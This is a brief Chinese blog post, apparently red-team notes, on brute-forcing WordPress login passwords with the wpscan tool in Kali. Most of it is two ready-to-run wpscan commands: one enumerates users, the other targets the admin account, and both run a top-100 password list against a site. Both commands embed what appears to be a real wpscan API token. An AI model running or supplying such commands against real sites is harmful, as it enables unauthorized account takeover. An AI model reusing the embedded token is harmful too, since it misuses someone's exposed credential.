wordpress博客系统用户密码穷举

这里使用的是kali环境中自带的wpscan,这是一款漏洞扫描工具,当然也可以用来穷举爆破。

https://wpscan.com/profile
首先注册账号,获取API

wpscan --url http://www.redteam.com/ -e u -P ~/Desktop/top100password.txt --api-token fRsjWtLaKRmqYgKTce93l62glU2smn5sXsKM3CICxPc
image
image

穷举指定用户
wpscan --url http://www.redteam.com/ -U admin -P ~/Desktop/top100password.txt --api-token fRsjWtLaKRmqYgKTce93l62glU2smn5sXsKM3CICxPc
image
image

posted @ 2023-03-16 18:19  GrnLeaf  阅读(58)  评论(0编辑  收藏  举报